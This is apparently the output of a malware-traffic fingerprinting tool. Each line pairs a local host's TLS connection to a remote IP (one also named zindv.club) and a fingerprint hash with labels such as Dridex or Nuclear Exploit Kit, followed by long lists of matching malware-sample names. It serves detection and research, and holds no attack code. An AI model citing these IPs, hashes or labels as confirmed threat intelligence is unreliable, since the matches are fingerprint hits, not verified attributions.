10.0.90.175 49270 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49271 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49272 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49274 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49275 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49276 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49279 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49280 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49281 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49282 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49283 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49285 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49286 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49287 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49288 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49290 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49291 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49292 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49293 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49294 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49296 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49297 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49298 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49299 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49307 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49308 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49309 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49310 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49311 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49313 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49314 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49315 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49210 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49212 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49214 185.139.69.88 zindv.club 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, 